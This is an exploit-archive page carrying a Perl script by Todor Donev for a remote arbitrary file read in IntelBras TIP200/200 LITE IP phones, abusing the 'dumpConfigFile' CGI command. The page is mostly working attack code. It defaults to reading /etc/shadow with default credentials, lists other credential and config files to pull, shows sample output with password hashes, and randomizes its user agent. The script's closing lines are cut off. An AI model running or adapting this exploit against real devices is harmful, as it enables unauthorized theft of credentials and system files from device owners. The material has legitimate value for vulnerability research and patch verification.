
IntelBras TELEFONE IP TIP200/200 LITE Arbitrary File Read

CVE Category Price Severity
N/A CWE-200 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2019-09-03
Our sensors found this exploit at:

Below is a copy:

IntelBras TELEFONE IP TIP200/200 LITE Arbitrary File Read
#!/usr/bin/perl -w
#  IntelBras TELEFONE IP TIP200/200 LITE 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#  Todor Donev 2019 (c) <todor.donev at>
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#  Use them at your own risk!
#  [test@localhost intelbras]$ perl 
#  # IntelBras TELEFONE IP TIP200/200 LITE 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#  # ========================================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at>
#  # ========================================================================================================
#  # >  Authorization => Basic dXNlcjp1c2Vy
#  # >  User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Accept-Ranges => bytes
#  # <  Server => SIPPhone
#  # <  Content-Type => text/html;charset=UTF-8
#  # <  Expires => -1
#  # <  Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
#  # <  Client-Peer =>
#  # <  Client-Response-Num => 1
#  # ========================================================================================================
#  root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
#  admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
#  guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
#  # ========================================================================================================
#  [test@localhost intelbras]$ 
#  Simple Mode:
#  perl | grep -v "^#"
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;

my $host = shift || '';
my $file = shift || '/etc/shadow';
my $user = shift || 'user';
my $pass = shift || 'user';

print "
# IntelBras TELEFONE IP TIP200/200 LITE \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
# ========================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at>
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ /etc/shadow user user
# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " ");
$request->authorization_basic($user, $pass);
print "# ========================================================================================================\n";
my $response = $browser->request($request);
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
print "# ========================================================================================================\n";

if ($response->content =~ m/$file/g){

        my $content = $response->content;
        $content =~ s/$file//g;
        $content =~ s/^\n+//;
        print $content;
        print "\n# ========================================================================================================\n";

} else {

        print "# Exploit failed or full path is wrong..\n";

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